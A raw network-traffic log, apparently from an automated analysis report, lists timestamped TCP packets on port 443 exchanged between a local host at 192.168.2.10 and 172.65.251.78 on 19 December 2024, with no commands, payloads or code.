                                                                                                                                                                                                                Dec 19, 2024 14:14:23.774141073 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:23.774178982 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:23.782100916 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:23.782139063 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:23.782180071 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:23.782193899 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:23.782222033 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:23.782238960 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:23.787833929 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:23.787849903 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:23.787913084 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:23.787920952 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:23.787962914 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:23.793231010 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:23.793251038 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:23.793296099 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:23.793304920 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:23.793385029 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:23.799804926 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:23.799823999 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:23.799880028 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:23.799886942 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:23.799925089 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:23.805608988 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:23.805632114 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:23.805680037 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:23.805699110 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:23.805725098 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:23.805742025 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:23.954368114 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:23.954391003 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:23.954523087 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:23.954536915 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:23.954586029 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:23.960489988 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:23.960509062 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:23.960608006 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:23.960618973 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:23.960664034 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:23.966113091 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:23.966129065 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:23.966228008 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:23.966240883 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:23.966286898 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:23.974252939 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:23.974281073 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:23.974359989 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:23.974371910 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:23.974414110 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:23.979243040 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:23.979283094 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:23.979363918 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:23.979377031 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:23.979412079 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:23.986615896 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:23.986635923 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:23.986721992 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:23.986733913 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:23.986769915 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:23.992969036 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:23.992985964 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:23.993166924 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:23.993201017 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:23.993259907 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:23.998688936 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:23.998709917 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:23.998795033 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:23.998807907 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:23.998848915 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.146640062 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.146661997 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.146769047 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.146799088 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.146842003 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.152560949 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.152575970 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.152657986 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.152666092 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.152702093 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.159482956 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.159497023 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.159570932 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.159586906 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.159626961 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.164995909 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.165009975 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.165101051 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.165115118 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.165158033 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.171530008 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.171545029 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.171638012 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.171646118 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.171689987 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.178093910 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.178112984 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.178185940 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.178195000 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.178235054 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.184710026 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.184751987 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.184832096 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.184840918 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.184884071 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.191749096 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.191766024 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.191833973 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.191847086 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.191926956 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.338802099 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.338831902 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.339003086 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.339027882 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.339066982 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.344820976 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.344844103 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.344993114 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.345010042 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.345052958 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.351375103 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.351406097 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.351531029 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.351548910 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.351592064 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.357126951 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.357148886 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.357244968 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.357255936 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.357292891 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.363632917 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.363651991 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.363718987 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.363729000 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.363770008 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.370264053 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.370286942 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.370377064 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.370385885 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.370455027 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.376396894 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.376445055 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.376528978 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.376543999 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.376591921 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.382994890 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.383018970 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.383110046 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.383121967 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.383163929 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.531260967 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.531290054 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.531514883 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.531549931 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.531598091 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.537244081 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.537262917 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.537342072 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.537353039 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.537400961 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.543164968 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.543183088 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.543246031 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.543253899 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.543292999 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.547776937 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.547827005 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.547859907 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.547868967 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.547897100 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.554399967 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.554421902 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.554517984 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.554529905 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.560853958 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.560870886 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.560940981 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.560951948 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.567071915 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.567092896 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.567147970 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.567167997 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.567193031 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.573633909 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.573658943 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.573746920 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.573764086 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.580909014 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.580933094 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.581032038 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.581053019 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.581069946 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.627935886 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.727653027 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.727679968 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.727751970 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.727776051 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.727826118 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.734252930 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.734267950 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.734327078 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.734338999 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.734385014 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.740781069 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.740797997 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.740865946 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.740878105 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.740932941 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.746582031 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.746622086 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.746656895 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.746666908 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.746704102 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.753693104 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.753737926 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.753772974 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.753782988 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.753814936 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.753835917 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.759490967 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.759532928 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.759566069 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.759574890 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.759619951 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.765959978 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.766000986 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.766041994 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.766051054 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.766078949 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.766105890 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.772706032 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.772779942 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.772804022 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.772816896 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.772846937 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.772865057 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.940057039 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.940130949 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.940210104 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.940229893 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.940258980 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.940280914 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.946579933 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.946603060 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.946645975 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.946657896 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.946696043 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.952408075 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.952436924 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.952502966 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.952514887 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.952550888 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.959553003 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.959572077 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.959642887 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.959652901 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.959688902 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.965128899 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.965152025 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.965209007 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.965219021 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.965254068 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.971633911 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.971657991 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.971710920 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.971719980 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.971751928 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.978389025 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.978415012 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.978473902 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.978482962 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.978517056 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.984041929 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.984066963 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.984117985 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.984127998 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.984146118 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:24.984164000 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.138727903 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.138763905 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.138843060 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.138873100 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.138890982 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.138915062 CET49729443192.168.2.10172.65.251.78
